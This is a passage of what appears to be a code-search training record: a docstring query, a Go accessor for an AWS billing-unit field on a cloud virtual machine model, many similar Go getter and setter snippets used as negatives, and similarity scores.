"0.4716365", "0.4710755", "0.47099835", "0.47056693", "0.4701216", "0.4690821", "0.46862406", "0.4685599", "0.46827686", "0.4680688", "0.46763676", "0.467553", "0.46746662" ]
0.81112826
0
HasAwsBillingUnit returns a boolean if a field has been set.
func (o *CloudAwsVirtualMachineAllOf) HasAwsBillingUnit() bool { if o != nil && o.AwsBillingUnit != nil { return true } return false }
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "func (o *InlineResponse20075Stats) HasBilling() bool {\n\tif o != nil && o.Billing != nil {\n\t\treturn true\n\t}\n\n\treturn false\n}", "func (o *ViewProjectActivePages) HasBilling() bool {\n\tif o != nil && o.Billing != nil {\n\t\treturn true\n\t}\n\n\treturn false\n}", "func (o *EnvironmentUsageDto) HasSyntheticBillingUsage() bool {\n\tif o != nil && o.SyntheticBillingUsage != nil {\n\t\treturn true\n\t}\n\n\treturn false\n}", "func (o *CloudAwsVirtualMachineAllOf) GetAwsBillingUnitOk() (*CloudAwsBillingUnitRelationship, bool) {\n\tif o == nil || o.AwsBillingUnit == nil {\n\t\treturn nil, false\n\t}\n\treturn o.AwsBillingUnit, true\n}", "func (o *AssetWorkloadOptimizerGoogleCloudPlatformBillingOptions) HasBillingAccountId() bool {\n\tif o != nil && o.BillingAccountId != nil {\n\t\treturn true\n\t}\n\n\treturn false\n}", "func (m NoSides) HasBookingUnit() bool {\n\treturn m.Has(tag.BookingUnit)\n}", "func (o *ReservationModel) HasUnit() bool {\n\tif o != nil && o.Unit != nil {\n\t\treturn true\n\t}\n\n\treturn false\n}", "func (o *CloudAwsVirtualMachineAllOf) GetAwsBillingUnit() CloudAwsBillingUnitRelationship {\n\tif o == nil || o.AwsBillingUnit == nil {\n\t\tvar ret CloudAwsBillingUnitRelationship\n\t\treturn ret\n\t}\n\treturn *o.AwsBillingUnit\n}", "func (o *Tier) HasBillingPeriodType() bool {\n\tif o != nil && o.BillingPeriodType != nil {\n\t\treturn true\n\t}\n\n\treturn false\n}", "func (o *AdminInfo) HasBusinessUnit() bool {\n\tif o != nil && o.BusinessUnit != nil {\n\t\treturn true\n\t}\n\n\treturn false\n}", "func (o *TransactionSplit) HasBunqPaymentId() bool {\n\tif o != nil && o.BunqPaymentId.IsSet() {\n\t\treturn true\n\t}\n\n\treturn false\n}", "func (o *EquipmentIoCardBase) HasSku() bool {\n\tif o != nil && o.Sku != nil {\n\t\treturn true\n\t}\n\n\treturn false\n}", "func (o *PartnerCustomerCreateRequest) HasBillingContact() bool {\n\tif o != nil && o.BillingContact != nil {\n\t\treturn true\n\t}\n\n\treturn false\n}", "func (o *EquipmentFanModule) HasSku() bool {\n\tif o != nil && o.Sku != nil {\n\t\treturn true\n\t}\n\n\treturn false\n}", "func (o *CloudAwsVirtualMachineAllOf) SetAwsBillingUnit(v CloudAwsBillingUnitRelationship) {\n\to.AwsBillingUnit = &v\n}", "func (o *TransferOriginatorDiligence) HasDebitUsageConfiguration() bool {\n\tif o != nil && o.DebitUsageConfiguration.IsSet() {\n\t\treturn true\n\t}\n\n\treturn false\n}", "func (o *Transaction) HasMerchantName() bool {\n\tif o != nil && o.MerchantName.IsSet() {\n\t\treturn true\n\t}\n\n\treturn false\n}", "func (o *DataExportQuery) HasUnit() bool {\n\tif o != nil && o.Unit != nil {\n\t\treturn true\n\t}\n\n\treturn false\n}", "func (si *ServiceInformation) HasAWSInfo() bool {\n\tif si.RequiredArn == nil {\n\t\treturn false\n\t}\n\treturn len(si.RequiredArn) > 0\n}", "func (o *AssetWorkloadOptimizerGoogleCloudPlatformBillingOptions) HasCostExportTableName() bool {\n\tif o != nil && o.CostExportTableName != nil {\n\t\treturn true\n\t}\n\n\treturn false\n}", "func (o *Ga4ghChemotherapy) HasDoseUnit() bool {\n\tif o != nil && o.DoseUnit != nil {\n\t\treturn true\n\t}\n\n\treturn false\n}", "func (o *CapabilitySiocModuleManufacturingDef) HasSku() bool {\n\tif o != nil && o.Sku != nil {\n\t\treturn true\n\t}\n\n\treturn false\n}", "func (o *StorageEnclosure) HasComputeRackUnit() bool {\n\tif o != nil && o.ComputeRackUnit != nil {\n\t\treturn true\n\t}\n\n\treturn false\n}", "func (o *BalanceResponse) HasGateway() bool {\n\tif o != nil && !IsNil(o.Gateway) {\n\t\treturn true\n\t}\n\n\treturn false\n}", "func (m *MockMappedResource) HasAws() bool {\n\tret := m.ctrl.Call(m, \"HasAws\")\n\tret0, _ := ret[0].(bool)\n\treturn ret0\n}", "func (m NoAllocs) HasAllocQty() bool {\n\treturn m.Has(tag.AllocQty)\n}", "func (mr *MockMappedResourceMockRecorder) HasAws() *gomock.Call {\n\treturn mr.mock.ctrl.RecordCallWithMethodType(mr.mock, \"HasAws\", reflect.TypeOf((*MockMappedResource)(nil).HasAws))\n}", "func (o *StorageSasExpander) HasComputeRackUnit() bool {\n\tif o != nil && o.ComputeRackUnit != nil {\n\t\treturn true\n\t}\n\n\treturn false\n}", "func (o *UcsdBackupInfoAllOf) HasIsPurged() bool {\n\tif o != nil && o.IsPurged != nil {\n\t\treturn true\n\t}\n\n\treturn false\n}", "func (o *TransferOriginatorDiligence) HasCreditUsageConfiguration() bool {\n\tif o != nil && o.CreditUsageConfiguration.IsSet() {\n\t\treturn true\n\t}\n\n\treturn false\n}", "func (o *AvailableBudget) HasSpentInBudgets() bool {\n\tif o != nil && o.SpentInBudgets != nil {\n\t\treturn true\n\t}\n\n\treturn false\n}", "func (o *BaseReportTransaction) HasMerchantName() bool {\n\tif o != nil && o.MerchantName.IsSet() {\n\t\treturn true\n\t}\n\n\treturn false\n}", "func (o *EmbeddedUnitModel) HasUnitGroupId() bool {\n\tif o != nil && o.UnitGroupId != nil {\n\t\treturn true\n\t}\n\n\treturn false\n}", "func (o *InlineResponse20075StatsBilling) HasActive() bool {\n\tif o != nil && o.Active != nil {\n\t\treturn true\n\t}\n\n\treturn false\n}", "func (o *ReservationModel) HasPaymentAccount() bool {\n\tif o != nil && o.PaymentAccount != nil {\n\t\treturn true\n\t}\n\n\treturn false\n}", "func (o *InlineResponse20075StatsBilling) HasCompleted() bool {\n\tif o != nil && o.Completed != nil {\n\t\treturn true\n\t}\n\n\treturn false\n}", "func (o *UserSessionQueryTileConfiguration) HasHasAxisBucketing() bool {\n\tif o != nil && o.HasAxisBucketing != nil {\n\t\treturn true\n\t}\n\n\treturn false\n}", "func (o *EditBankConnectionParams) HasBankingUserId() bool {\n\tif o != nil && o.BankingUserId != nil {\n\t\treturn true\n\t}\n\n\treturn false\n}", "func (o *AssetWorkloadOptimizerGoogleCloudPlatformBillingOptions) HasPricingExportTableName() bool {\n\tif o != nil && o.PricingExportTableName != nil {\n\t\treturn true\n\t}\n\n\treturn false\n}", "func (o *NetworkingProjectNetworkCreate) HasGateway() bool {\n\tif o != nil && o.Gateway != nil {\n\t\treturn true\n\t}\n\n\treturn false\n}", "func (o *Invoice) HasBuyer() bool {\n\tif o != nil && o.Buyer != nil {\n\t\treturn true\n\t}\n\n\treturn false\n}", "func (o *ViewProjectActivePages) GetBilling() bool {\n\tif o == nil || o.Billing == nil {\n\t\tvar ret bool\n\t\treturn ret\n\t}\n\treturn *o.Billing\n}", "func (o *CatalogEntry) HasUnitPrice() bool {\n\tif o != nil && o.UnitPrice != nil {\n\t\treturn true\n\t}\n\n\treturn false\n}", "func (o *Invoice) HasSeller() bool {\n\tif o != nil && o.Seller != nil {\n\t\treturn true\n\t}\n\n\treturn false\n}", "func (o *DeliveryS3Authentication) HasSecretKey() bool {\n\tif o != nil && o.SecretKey != nil {\n\t\treturn true\n\t}\n\n\treturn false\n}", "func (o *LoyaltyBalances) HasSubledgerBalances() bool {\n\tif o != nil && o.SubledgerBalances != nil {\n\t\treturn true\n\t}\n\n\treturn false\n}", "func (o *PaymentStatusUpdateWebhook) HasTransactionId() bool {\n\tif o != nil && o.TransactionId.IsSet() {\n\t\treturn true\n\t}\n\n\treturn false\n}", "func (o *ViewProjectActivePages) GetBillingOk() (*bool, bool) {\n\tif o == nil || o.Billing == nil {\n\t\treturn nil, false\n\t}\n\treturn o.Billing, true\n}", "func (o *DataExportQuery) HasUnitReference() bool {\n\tif o != nil && o.UnitReference != nil {\n\t\treturn true\n\t}\n\n\treturn false\n}", "func (o *InstitutionsSearchAccountFilter) HasInvestment() bool {\n\tif o != nil && o.Investment != nil {\n\t\treturn true\n\t}\n\n\treturn false\n}", "func (o *W2) HasFederalIncomeTaxWithheld() bool {\n\tif o != nil && o.FederalIncomeTaxWithheld.IsSet() {\n\t\treturn true\n\t}\n\n\treturn false\n}", "func (o *V0037Node) HasBurstbufferNetworkAddress() bool {\n\tif o != nil && o.BurstbufferNetworkAddress != nil {\n\t\treturn true\n\t}\n\n\treturn false\n}", "func (o *NetworkElementSummaryAllOf) HasInbandIpGateway() bool {\n\tif o != nil && o.InbandIpGateway != nil {\n\t\treturn true\n\t}\n\n\treturn false\n}", "func (o *BlockDeviceMappingVmUpdate) HasBsu() bool {\n\tif o != nil && o.Bsu != nil {\n\t\treturn true\n\t}\n\n\treturn false\n}", "func (o *V0037JobProperties) HasGpus() bool {\n\tif o != nil && o.Gpus != nil {\n\t\treturn true\n\t}\n\n\treturn false\n}", "func (o *NetworkElementSummaryAllOf) HasOutOfBandIpv4Gateway() bool {\n\tif o != nil && o.OutOfBandIpv4Gateway != nil {\n\t\treturn true\n\t}\n\n\treturn false\n}", "func (o *CheckoutResponse) HasPaymentsLimitCount() bool {\n\tif o != nil && o.PaymentsLimitCount.IsSet() {\n\t\treturn true\n\t}\n\n\treturn false\n}", "func (o *Wireless) HasVendor() bool {\n\tif o != nil && o.Vendor != nil {\n\t\treturn true\n\t}\n\n\treturn false\n}", "func (o *SessionPropertiesQuota) HasConsumedThisYear() bool {\n\tif o != nil && o.ConsumedThisYear != nil {\n\t\treturn true\n\t}\n\n\treturn false\n}", "func (o *HoldingsOverride) HasCostBasis() bool {\n\tif o != nil && o.CostBasis != nil {\n\t\treturn true\n\t}\n\n\treturn false\n}", "func (o *User) HasLicenseDetails() bool {\n\tif o != nil && o.LicenseDetails != nil {\n\t\treturn true\n\t}\n\n\treturn false\n}", "func (o *LoyaltyBalances) HasBalance() bool {\n\tif o != nil && o.Balance != nil {\n\t\treturn true\n\t}\n\n\treturn false\n}", "func (o *RequestSepaMoneyTransferParams) HasBankingPin() bool {\n\tif o != nil && o.BankingPin != nil {\n\t\treturn true\n\t}\n\n\treturn false\n}", "func (o *InlineObject753) HasDatePurchased() bool {\n\tif o != nil && o.DatePurchased != nil {\n\t\treturn true\n\t}\n\n\treturn false\n}", "func (o *VnicEthAdapterPolicyInventory) HasCompletionQueueSettings() bool {\n\tif o != nil && o.CompletionQueueSettings.IsSet() {\n\t\treturn true\n\t}\n\n\treturn false\n}", "func (o *CompanyPayoutDestinationResponse) HasBank() bool {\n\tif o != nil && !IsNil(o.Bank) {\n\t\treturn true\n\t}\n\n\treturn false\n}", "func (o *NetworkLicenseFile) HasVendor() bool {\n\tif o != nil && o.Vendor != nil {\n\t\treturn true\n\t}\n\n\treturn false\n}", "func (o *PayPeriodDetails) HasGrossEarnings() bool {\n\tif o != nil && o.GrossEarnings.IsSet() {\n\t\treturn true\n\t}\n\n\treturn false\n}", "func (o *CreateRouteRequest) HasGatewayId() bool {\n\tif o != nil && o.GatewayId != nil {\n\t\treturn true\n\t}\n\n\treturn false\n}", "func (o *EquipmentFanModule) HasComputeRackUnit() bool {\n\tif o != nil && o.ComputeRackUnit != nil {\n\t\treturn true\n\t}\n\n\treturn false\n}", "func (o *WafDdosSettings) HasBurstThreshold() bool {\n\tif o != nil && o.BurstThreshold != nil {\n\t\treturn true\n\t}\n\n\treturn false\n}", "func (o *EditBankConnectionParams) HasBankingPin() bool {\n\tif o != nil && o.BankingPin != nil {\n\t\treturn true\n\t}\n\n\treturn false\n}", "func (o *TransactionSplit) HasBudgetId() bool {\n\tif o != nil && o.BudgetId.IsSet() {\n\t\treturn true\n\t}\n\n\treturn false\n}", "func (o *AssetWorkloadOptimizerGoogleCloudPlatformBillingOptions) HasCostExportDataSetName() bool {\n\tif o != nil && o.CostExportDataSetName != nil {\n\t\treturn true\n\t}\n\n\treturn false\n}", "func (o *ViewTimelogTotals) HasMinutesBilled() bool {\n\tif o != nil && o.MinutesBilled != nil {\n\t\treturn true\n\t}\n\n\treturn false\n}", "func (o *InlineObject753) HasCost() bool {\n\tif o != nil && o.Cost != nil {\n\t\treturn true\n\t}\n\n\treturn false\n}", "func (o *PiggyBankEvent) HasTransactionGroupId() bool {\n\tif o != nil && o.TransactionGroupId != nil {\n\t\treturn true\n\t}\n\n\treturn false\n}", "func (o *MemoryArrayAllOf) HasComputeRackUnit() bool {\n\tif o != nil && o.ComputeRackUnit != nil {\n\t\treturn true\n\t}\n\n\treturn false\n}", "func (o *EditBankConnectionParams) HasBankingCustomerId() bool {\n\tif o != nil && o.BankingCustomerId != nil {\n\t\treturn true\n\t}\n\n\treturn false\n}", "func (o *PaymentInitiationPaymentGetResponse) HasTransactionId() bool {\n\tif o != nil && o.TransactionId.IsSet() {\n\t\treturn true\n\t}\n\n\treturn false\n}", "func (o *TransactionSplit) HasBudgetName() bool {\n\tif o != nil && o.BudgetName.IsSet() {\n\t\treturn true\n\t}\n\n\treturn false\n}", "func (o *SubDescriptionDto) HasUnitTag() bool {\n\tif o != nil && !IsNil(o.UnitTag) {\n\t\treturn true\n\t}\n\n\treturn false\n}", "func (o *W2) HasSocialSecurityTaxWithheld() bool {\n\tif o != nil && o.SocialSecurityTaxWithheld.IsSet() {\n\t\treturn true\n\t}\n\n\treturn false\n}", "func (o *VnicEthAdapterPolicyInventory) HasTxQueueSettings() bool {\n\tif o != nil && o.TxQueueSettings.IsSet() {\n\t\treturn true\n\t}\n\n\treturn false\n}", "func (o *SmartstackBackend) HasCheckDuration() bool {\n\tif o != nil && o.CheckDuration != nil {\n\t\treturn true\n\t}\n\n\treturn false\n}", "func (o *TransactionSplit) HasBillName() bool {\n\tif o != nil && o.BillName.IsSet() {\n\t\treturn true\n\t}\n\n\treturn false\n}", "func (o *DeferredResultVoid) HasSetOrExpired() bool {\n\tif o != nil && o.SetOrExpired != nil {\n\t\treturn true\n\t}\n\n\treturn false\n}", "func (o *TransactionSplit) HasBillId() bool {\n\tif o != nil && o.BillId.IsSet() {\n\t\treturn true\n\t}\n\n\treturn false\n}", "func (o *ViewTimelogTotals) HasMinutesNonBilled() bool {\n\tif o != nil && o.MinutesNonBilled != nil {\n\t\treturn true\n\t}\n\n\treturn false\n}", "func (d UserData) HasBanks() bool {\n\treturn d.ModelData.Has(models.NewFieldName(\"Banks\", \"banks_ids\"))\n}", "func (creds AwsCredentials) IsGov() bool {\n\treturn strings.Contains(creds.Region, \"-gov-\")\n}", "func IsHasField(st interface{}, fieldName string) bool {\n\treturn HasField(st, fieldName)\n}", "func (o *CartaoProduto) HasUsr() bool {\n\tif o != nil && o.Usr.IsSet() {\n\t\treturn true\n\t}\n\n\treturn false\n}", "func (o *DisplayInfo) HasRegion() bool {\n\tif o != nil && o.Region != nil {\n\t\treturn true\n\t}\n\n\treturn false\n}", "func (o *CreditBankIncomeItem) HasBankIncomeSources() bool {\n\tif o != nil && o.BankIncomeSources != nil {\n\t\treturn true\n\t}\n\n\treturn false\n}", "func (o *EnvironmentUsageDto) HasTrial() bool {\n\tif o != nil && o.Trial != nil {\n\t\treturn true\n\t}\n\n\treturn false\n}", "func (d UserData) HasIndustry() bool {\n\treturn d.ModelData.Has(models.NewFieldName(\"Industry\", \"industry_id\"))\n}", "func (o *MacpoolLeaseAllOf) HasPoolMember() bool {\n\tif o != nil && o.PoolMember != nil {\n\t\treturn true\n\t}\n\n\treturn false\n}", "func (o *RackUnitPersonality) HasComputeRackUnit() bool {\n\tif o != nil && o.ComputeRackUnit != nil {\n\t\treturn true\n\t}\n\n\treturn false\n}", "func (o *NetworkElementSummaryAllOf) HasOutOfBandIpGateway() bool {\n\tif o != nil && o.OutOfBandIpGateway != nil {\n\t\treturn true\n\t}\n\n\treturn false\n}" ]
[ "0.700311", "0.6667693", "0.65554816", "0.64047885", "0.62540424", "0.5994485", "0.5865692", "0.5797638", "0.57723415", "0.56910723", "0.56457406", "0.5550224", "0.55298436", "0.55039054", "0.55026925", "0.54983115", "0.549359", "0.54661155", "0.54456234", "0.53839856", "0.536572", "0.53602386", "0.53551555", "0.53445905", "0.533943", "0.53341556", "0.53334373", "0.5307457", "0.5282144", "0.5241433", "0.5237928", "0.5233075", "0.52311265", "0.5230919", "0.51686054", "0.51615894", "0.5159531", "0.5153285", "0.5151707", "0.5142784", "0.51141375", "0.5099033", "0.50956964", "0.5094293", "0.5083512", "0.50821745", "0.50785625", "0.5069865", "0.50695705", "0.50575155", "0.50426334", "0.5042117", "0.50330377", "0.5031108", "0.501422", "0.5010588", "0.5005353", "0.5000548", "0.49966633", "0.49943334", "0.4993811", "0.49837536", "0.49815363", "0.4980494", "0.49785548", "0.49784204", "0.49572134", "0.49559945", "0.49491426", "0.49477884", "0.4941589", "0.49415216", "0.49347687", "0.49344397", "0.49316937", "0.49294528", "0.4924429", "0.49177712", "0.49169058", "0.4908566", "0.49082628", "0.49051005", "0.4892426", "0.48906067", "0.48902977", "0.48869726", "0.4876846", "0.48697388", "0.48631775", "0.4860686", "0.4857412", "0.48564634", "0.48502782", "0.4849163", "0.48419368", "0.48381874", "0.48357502", "0.48339614", "0.48324448", "0.48245093" ]
0.8600866
0
SetAwsBillingUnit gets a reference to the given CloudAwsBillingUnitRelationship and assigns it to the AwsBillingUnit field.
func (o *CloudAwsVirtualMachineAllOf) SetAwsBillingUnit(v CloudAwsBillingUnitRelationship) { o.AwsBillingUnit = &v }
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "func (o *CloudAwsVirtualMachineAllOf) GetAwsBillingUnit() CloudAwsBillingUnitRelationship {\n\tif o == nil || o.AwsBillingUnit == nil {\n\t\tvar ret CloudAwsBillingUnitRelationship\n\t\treturn ret\n\t}\n\treturn *o.AwsBillingUnit\n}", "func (o *CloudAwsVirtualMachineAllOf) HasAwsBillingUnit() bool {\n\tif o != nil && o.AwsBillingUnit != nil {\n\t\treturn true\n\t}\n\n\treturn false\n}", "func (o *CloudAwsVirtualMachineAllOf) GetAwsBillingUnitOk() (*CloudAwsBillingUnitRelationship, bool) {\n\tif o == nil || o.AwsBillingUnit == nil {\n\t\treturn nil, false\n\t}\n\treturn o.AwsBillingUnit, true\n}", "func (o *GetMetricsParams) SetBillingRegions(billingRegions *string) {\n\to.BillingRegions = billingRegions\n}", "func (m NoSides) SetBookingUnit(v enum.BookingUnit) {\n\tm.Set(field.NewBookingUnit(v))\n}", "func (_options *ImportAccountToEnterpriseOptions) SetBillingUnitID(billingUnitID string) *ImportAccountToEnterpriseOptions {\n\t_options.BillingUnitID = core.StringPtr(billingUnitID)\n\treturn _options\n}", "func (o *GetRecipeInformation200ResponseExtendedIngredientsInner) SetUnit(v string) {\n\to.Unit = v\n}", "func (o *DataExportQuery) SetUnitReference(v int32) {\n\to.UnitReference = &v\n}", "func (o *ReservationModel) SetUnit(v EmbeddedUnitModel) {\n\to.Unit = &v\n}", "func (tu *TimingUpdate) SetUnit(s string) *TimingUpdate {\n\ttu.mutation.SetUnit(s)\n\treturn tu\n}", "func (r ApiGetOrganizationShortenCountsRequest) UnitReference(unitReference string) ApiGetOrganizationShortenCountsRequest {\n\tr.unitReference = &unitReference\n\treturn r\n}", "func (tuo *TimingUpdateOne) SetUnit(s string) *TimingUpdateOne {\n\ttuo.mutation.SetUnit(s)\n\treturn tuo\n}", "func (o *StockKeepingUnitContent) SetSku(exec boil.Executor, insert bool, related *StockKeepingUnit) error {\n\tvar err error\n\tif insert {\n\t\tif err = related.Insert(exec, boil.Infer()); err != nil {\n\t\t\treturn errors.Wrap(err, \"failed to insert into foreign table\")\n\t\t}\n\t}\n\n\tupdateQuery := fmt.Sprintf(\n\t\t\"UPDATE \\\"stock_keeping_unit_content\\\" SET %s WHERE %s\",\n\t\tstrmangle.SetParamNames(\"\\\"\", \"\\\"\", 1, []string{\"sku_id\"}),\n\t\tstrmangle.WhereClause(\"\\\"\", \"\\\"\", 2, stockKeepingUnitContentPrimaryKeyColumns),\n\t)\n\tvalues := []interface{}{related.ID, o.ID}\n\n\tif boil.DebugMode {\n\t\tfmt.Fprintln(boil.DebugWriter, updateQuery)\n\t\tfmt.Fprintln(boil.DebugWriter, values)\n\t}\n\tif _, err = exec.Exec(updateQuery, values...); err != nil {\n\t\treturn errors.Wrap(err, \"failed to update local table\")\n\t}\n\n\to.SkuID = related.ID\n\tif o.R == nil {\n\t\to.R = &stockKeepingUnitContentR{\n\t\t\tSku: related,\n\t\t}\n\t} else {\n\t\to.R.Sku = related\n\t}\n\n\tif related.R == nil {\n\t\trelated.R = &stockKeepingUnitR{\n\t\t\tSkuStockKeepingUnitContents: StockKeepingUnitContentSlice{o},\n\t\t}\n\t} else {\n\t\trelated.R.SkuStockKeepingUnitContents = append(related.R.SkuStockKeepingUnitContents, o)\n\t}\n\n\treturn nil\n}", "func (q *OperationQueue) SetBalance(owner string, balance uint64) {\n\tq.cache.SetBalance(owner, balance)\n}", "func (o *InlineResponse20075Stats) SetBilling(v InlineResponse20075StatsBilling) {\n\to.Billing = &v\n}", "func (o *ViewProjectActivePages) SetBilling(v bool) {\n\to.Billing = &v\n}", "func (o *AdminInfo) SetBusinessUnit(v BusinessUnit) {\n\to.BusinessUnit = &v\n}", "func (o *DataExportQuery) SetUnit(v string) {\n\to.Unit = &v\n}", "func (c *Client) SetBillingID(id string) {\n\tc.mu.Lock()\n\tdefer c.mu.Unlock()\n\tc.billingID = id\n}", "func (r ApiGetMetricsForBitlinkByCountriesRequest) UnitReference(unitReference string) ApiGetMetricsForBitlinkByCountriesRequest {\n\tr.unitReference = &unitReference\n\treturn r\n}", "func (s *HistoricalMetric) SetUnit(v string) *HistoricalMetric {\n\ts.Unit = &v\n\treturn s\n}", "func (r ApiGetMetricsForBitlinkByCitiesRequest) UnitReference(unitReference string) ApiGetMetricsForBitlinkByCitiesRequest {\n\tr.unitReference = &unitReference\n\treturn r\n}", "func (m *OrgUnitMemberMutation) ResetBelongToOrgUnit() {\n\tm.belongToOrgUnit = nil\n\tm.clearedbelongToOrgUnit = false\n}", "func (s *Spend) SetUnit(v string) *Spend {\n\ts.Unit = &v\n\treturn s\n}", "func (c *clustermgrClient) ReleaseVolumeUnit(ctx context.Context, vuid proto.Vuid, diskID proto.DiskID) (err error) {\n\tc.rwLock.Lock()\n\tdefer c.rwLock.Unlock()\n\n\tspan := trace.SpanFromContextSafe(ctx)\n\n\tspan.Debugf(\"release volume unit: args vuid[%d], disk_id[%d]\", vuid, diskID)\n\terr = c.client.ReleaseVolumeUnit(ctx, &cmapi.ReleaseVolumeUnitArgs{Vuid: vuid, DiskID: diskID})\n\tspan.Debugf(\"release volume unit ret: err[%+v]\", err)\n\n\treturn\n}", "func (s *CurrentMetric) SetUnit(v string) *CurrentMetric {\n\ts.Unit = &v\n\treturn s\n}", "func SetFlagUnit(name string, unit units.Unit) {\n\tsetFlagUnit(name, unit)\n}", "func (s dbBilling) setUserBillingCustomerID(ctx context.Context, userID int32, billingCustomerID *string) error {\n\tquery := sqlf.Sprintf(\"UPDATE users SET billing_customer_id=%s WHERE id=%d AND deleted_at IS NULL\", billingCustomerID, userID)\n\tres, err := s.db.ExecContext(ctx, query.Query(sqlf.PostgresBindVar), query.Args()...)\n\tif err != nil {\n\t\treturn err\n\t}\n\tnrows, err := res.RowsAffected()\n\tif err != nil {\n\t\treturn err\n\t}\n\tif nrows == 0 {\n\t\treturn database.NewUserNotFoundError(userID)\n\t}\n\treturn nil\n}", "func (r ApiGetClicksSummaryForBitlinkRequest) UnitReference(unitReference string) ApiGetClicksSummaryForBitlinkRequest {\n\tr.unitReference = &unitReference\n\treturn r\n}", "func (ms MetricDescriptor) SetUnit(v string) {\n\t(*ms.orig).Unit = v\n}", "func (r ApiGetSortedBitlinksRequest) UnitReference(unitReference string) ApiGetSortedBitlinksRequest {\n\tr.unitReference = &unitReference\n\treturn r\n}", "func (s *PolicySummary) SetAwsManaged(v bool) *PolicySummary {\n\ts.AwsManaged = &v\n\treturn s\n}", "func (r ApiGetClicksForBitlinkRequest) UnitReference(unitReference string) ApiGetClicksForBitlinkRequest {\n\tr.unitReference = &unitReference\n\treturn r\n}", "func (r ApiGetMetricsForBitlinkByReferringDomainsRequest) UnitReference(unitReference string) ApiGetMetricsForBitlinkByReferringDomainsRequest {\n\tr.unitReference = &unitReference\n\treturn r\n}", "func (o *GetMetricsParams) WithBillingRegions(billingRegions *string) *GetMetricsParams {\n\to.SetBillingRegions(billingRegions)\n\treturn o\n}", "func (r ApiGetMetricsForBitlinkByDevicesRequest) UnitReference(unitReference string) ApiGetMetricsForBitlinkByDevicesRequest {\n\tr.unitReference = &unitReference\n\treturn r\n}", "func (s *ReportDefinition) SetBillingViewArn(v string) *ReportDefinition {\n\ts.BillingViewArn = &v\n\treturn s\n}", "func (u *Unit) SetUnitProperty(w http.ResponseWriter) error {\n\tconn, err := sd.NewSystemdConnection()\n\tif err != nil {\n\t\tlog.Errorf(\"Failed to get systemd bus connection: %v\", err)\n\t\treturn err\n\t}\n\tdefer conn.Close()\n\n\tswitch u.Property {\n\tcase \"CPUShares\":\n\t\tn, err := strconv.ParseInt(u.Value, 10, 64)\n\t\tif err != nil {\n\t\t\tlog.Errorf(\"Failed to parse CPUShares: %v\", err)\n\t\t\treturn err\n\t\t}\n\n\t\tp := sd.Property{\n\t\t\tName: \"CPUShares\",\n\t\t\tValue: dbus.MakeVariant(uint64(n)),\n\t\t}\n\t\terr = conn.SetUnitProperties(u.Unit, true, p)\n\t\tif err != nil {\n\t\t\tlog.Errorf(\"Failed to set CPUShares %s: %v\", u.Value, err)\n\t\t\treturn err\n\t\t}\n\t\tbreak\n\t}\n\n\treturn nil\n}", "func WithUnit(u unit.Unit) Option {\n\treturn optionFunc(func(cfg Config) Config {\n\t\tcfg.unit = u\n\t\treturn cfg\n\t})\n}", "func SetSizeGB(target SizeMB, sizeGB int) {\n\ttarget.SetSizeMB(size.GiBToMiB(sizeGB))\n}", "func (a *BackoffTimerValue) SetUnitTimerValue(unitTimerValue uint8) {}", "func (m *OrgUnitMemberMutation) ClearBelongToOrgUnit() {\n\tm.clearedbelongToOrgUnit = true\n}", "func (s *Shader) SetUniformBlock(name string, value interface{}, size int) {\n\t// check if the uniform buffer object already exists\n\tubo, ok := s.uniformBOs[name]\n\tif !ok {\n\t\t// if not, generate one\n\t\tgl.GenBuffers(1, &ubo)\n\t\ts.uniformBOs[name] = ubo\n\t}\n\n\tgl.BindBuffer(gl.UNIFORM_BUFFER, ubo)\n\n\t// set the new data\n\tgl.BufferData(gl.UNIFORM_BUFFER, size, nil, gl.DYNAMIC_DRAW)\n\tgl.BindBufferBase(gl.UNIFORM_BUFFER, s.getUniformBlockLocation(name), ubo)\n}", "func (m *AgedAccountsPayable) SetBalanceDue(value *float64)() {\n err := m.GetBackingStore().Set(\"balanceDue\", value)\n if err != nil {\n panic(err)\n }\n}", "func (oupq *OrgUnitPositionQuery) WithBelongToOrgUnit(opts ...func(*OrgUnitQuery)) *OrgUnitPositionQuery {\n\tquery := &OrgUnitQuery{config: oupq.config}\n\tfor _, opt := range opts {\n\t\topt(query)\n\t}\n\toupq.withBelongToOrgUnit = query\n\treturn oupq\n}", "func (s *Scale) SetUnit(v string) *Scale {\n\ts.Unit = &v\n\treturn s\n}", "func (cg *CGroup) SetBlkioWeight(limit int64) error {\n\tversion := cgControllers[\"blkio\"]\n\tswitch version {\n\tcase Unavailable:\n\t\treturn ErrControllerMissing\n\tcase V1:\n\t\treturn cg.rw.Set(version, \"blkio\", \"blkio.weight\", fmt.Sprintf(\"%d\", limit))\n\tcase V2:\n\t\treturn cg.rw.Set(version, \"io\", \"io.weight\", fmt.Sprintf(\"%d\", limit))\n\t}\n\n\treturn ErrUnknownVersion\n}", "func (o VoiceConnectorOutput) AwsRegion() pulumi.StringPtrOutput {\n\treturn o.ApplyT(func(v *VoiceConnector) pulumi.StringPtrOutput { return v.AwsRegion }).(pulumi.StringPtrOutput)\n}", "func (_BaseLibrary *BaseLibraryTransactor) SetAddressKMS(opts *bind.TransactOpts, address_KMS common.Address) (*types.Transaction, error) {\n\treturn _BaseLibrary.contract.Transact(opts, \"setAddressKMS\", address_KMS)\n}", "func (_Container *ContainerTransactor) SetAddressKMS(opts *bind.TransactOpts, address_KMS common.Address) (*types.Transaction, error) {\n\treturn _Container.contract.Transact(opts, \"setAddressKMS\", address_KMS)\n}", "func (m *PaymentchannelMutation) SetBank(s string) {\n\tm._Bank = &s\n}", "func (r ApiGetMetricsForBitlinkByReferrersRequest) UnitReference(unitReference string) ApiGetMetricsForBitlinkByReferrersRequest {\n\tr.unitReference = &unitReference\n\treturn r\n}", "func (oumu *OrgUnitMemberUpdate) SetBelongToOrgUnit(o *OrgUnit) *OrgUnitMemberUpdate {\n\treturn oumu.SetBelongToOrgUnitID(o.ID)\n}", "func (o *Ga4ghChemotherapy) SetDoseUnit(v string) {\n\to.DoseUnit = &v\n}", "func (r ApiGetMetricsForBitlinkByReferrersByDomainsRequest) UnitReference(unitReference string) ApiGetMetricsForBitlinkByReferrersByDomainsRequest {\n\tr.unitReference = &unitReference\n\treturn r\n}", "func (o ClusterNodeGroupSubscriptionConfigOutput) PaymentDurationUnit() pulumi.StringOutput {\n\treturn o.ApplyT(func(v ClusterNodeGroupSubscriptionConfig) string { return v.PaymentDurationUnit }).(pulumi.StringOutput)\n}", "func (o *TransactionSplit) 